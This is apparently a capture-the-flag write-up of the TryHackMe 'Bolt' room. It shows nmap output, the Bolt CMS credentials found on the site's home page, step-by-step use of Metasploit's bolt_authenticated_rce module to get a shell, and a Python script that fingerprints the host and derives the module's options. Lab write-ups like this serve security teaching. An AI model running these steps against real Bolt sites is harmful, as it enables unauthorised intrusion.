Tryhackme Bolt Writeup

Nelly Mutai
4 min read · Jul 10, 2021

Task1:Deploy the machine and obtain IP

Task2:Hack Your Way into the machine

Begin by enumerating the machine with an nmap scan to identify open ports:

```
sudo nmap -A -T4 -sV -sC -p- --open -oA bolt_full_scan 10.10.54.222
[sudo] password for ellell:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-10 15:13 EAT
Stats: 0:00:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 15:14 (0:00:12 remaining)
Nmap scan report for 10.10.54.222
Host is up (0.18s latency).
Not shown: 65514 closed ports, 18 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open  http    (PHP 7.2.32-1)
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Date: Sat, 10 Jul 2021 12:13:02 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: private, must-revalidate
|     Date: Sat, 10 Jul 2021 12:13:02 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: f56699
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     </head>
|     <body>
|     href="#main-content" class="vis
|   GetRequest:
|     HTTP/1.0 200 OK
|     Date: Sat, 10 Jul 2021 12:13:01 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: public, s-maxage=600
|     Date: Sat, 10 Jul 2021 12:13:01 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: cba7fd
|     <!doctype html>
|     <html lang="en-GB">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     <link rel="canonical" href="http://0.0.0.0:8000/">
|     </head>
|_    <body class="front">
|_http-generator: Bolt
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Bolt | A hero is unleashed
```

Open ports: 22 (SSH), 80 (HTTP, Apache default page) and 8000 (HTTP, PHP application).

  • Browse to http://machineIP/: this is only the default Apache page.
  • Browsing to http://machineIP:8000/ gives a different site. The Wappalyzer extension identifies the CMS as Bolt, and the site's footer confirms it. The nmap fingerprint above already tells the same story: the X-Powered-By header gives the PHP build, the generator meta tag says Bolt, and the X-Debug-Token header means the Symfony web profiler (debug mode) is enabled on the target.
  • The home page carries two messages. The one from admin reveals the admin's username, bolt.
  • The other message, addressed to the IT department, reveals that user's password.
  • Both messages are dated 18 July 2020. Checking the Bolt release history on GitHub (https://github.com/bolt/bolt/releases) against that date gives the installed build as 3.7.1.
  • In msfconsole, run use exploit/unix/webapp/bolt_authenticated_rce
  • show options
  • set LHOST to your tun0 address, RHOSTS to the target IP, and USERNAME and PASSWORD to the credentials found above. Bolt is listening on port 8000 rather than 80, so make sure RPORT is set to 8000.
  • run check to confirm the target is vulnerable
  • run exploit
  • In the resulting shell, go to /home to find the flag.
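The fingerprinting done by hand above (open ports from nmap, CMS and PHP build from the response on port 8000, and the port the exploit module must be pointed at) can be scripted. The following is an added example written for this writeup; it is not code from the original post, from Bolt or from the Metasploit module. Both sample inputs are constructed from the nmap output reproduced above, the function names are this example's own, and RHOSTS, RPORT and TARGETURI are assumed only because they are standard Metasploit HttpClient options.

```python
"""Fingerprint the Bolt host from the scan data in this writeup.

Added example, not part of the original writeup or of Bolt/Metasploit.
Both sample inputs are constructed from the nmap output reproduced above.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: the port table from the writeup's nmap scan.
NMAP_SAMPLE = """\
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open  http    (PHP 7.2.32-1)
"""

# Constructed sample: the GetRequest response nmap captured on port 8000,
# trimmed to the headers and tags that matter for fingerprinting.
HTTP_SAMPLE = (
    "HTTP/1.0 200 OK\r\n"
    "Date: Sat, 10 Jul 2021 12:13:01 GMT\r\n"
    "Connection: close\r\n"
    "X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1\r\n"
    "Cache-Control: public, s-maxage=600\r\n"
    "Date: Sat, 10 Jul 2021 12:13:01 GMT\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "X-Debug-Token: cba7fd\r\n"
    "\r\n"
    '<!doctype html>\n<html lang="en-GB">\n<head>\n'
    "<title>Bolt | A hero is unleashed</title>\n"
    '<link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">\n'
    '<meta name="generator" content="Bolt">\n'
    '<link rel="canonical" href="http://0.0.0.0:8000/">\n'
    '</head>\n<body class="front">\n'
)

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


def parse_open_ports(nmap_text):
    """Return (port, service, version) for every 'open' row of nmap's port table."""
    ports = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append((int(m.group(1)), m.group(3), m.group(4).strip()))
    return ports


def parse_http_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers, body).

    Header names are lower-cased and values kept as lists, so a repeated
    header (nmap's capture shows Date twice) is not silently overwritten.
    """
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = {}
    for hl in header_lines:
        name, _, value = hl.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def fingerprint_bolt(raw):
    """Pull the CMS, theme, PHP build and debug indicator out of one response."""
    status, headers, body = parse_http_response(raw)
    gen = re.search(r'<meta name="generator" content="([^"]+)"', body)
    canon = re.search(r'<link rel="canonical" href="([^"]+)"', body)
    theme = re.search(r'href="/theme/([^/"]+)/', body)
    return {
        "status": status,
        "cms": gen.group(1) if gen else None,
        "theme": theme.group(1) if theme else None,
        "php": headers.get("x-powered-by", [None])[0],
        "canonical": canon.group(1) if canon else None,
        # X-Debug-Token is emitted by Symfony's web profiler. Bolt 3 is built
        # on Symfony components, so seeing it means the site runs with the
        # debug toolbar/profiler enabled, which is itself worth reporting.
        "symfony_debug": "x-debug-token" in headers,
    }


def msf_target(rhost, findings):
    """Map the fingerprint onto the module's HttpClient options.

    RHOSTS, RPORT and TARGETURI are assumed here because they are standard
    Metasploit HttpClient options. The port is taken from the canonical link
    so the module is pointed at 8000, where Bolt listens, not the Apache
    default page on 80.
    """
    url = urlsplit(findings["canonical"] or "http://%s/" % rhost)
    return {"RHOSTS": rhost, "RPORT": url.port or 80, "TARGETURI": url.path or "/"}


if __name__ == "__main__":
    for port, svc, ver in parse_open_ports(NMAP_SAMPLE):
        print(f"{port}/tcp {svc} {ver}")
    fp = fingerprint_bolt(HTTP_SAMPLE)
    print(fp)
    print(msf_target("10.10.54.222", fp))
```

Run it as-is to see the parsed port list, the fingerprint dictionary and the derived module options; swapping HTTP_SAMPLE for a response you capture yourself with curl -i is the only change needed to reuse it on another Bolt target.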

Thank you for reading my article!!

Nelly Mutai: CTF player, information security researcher, pentester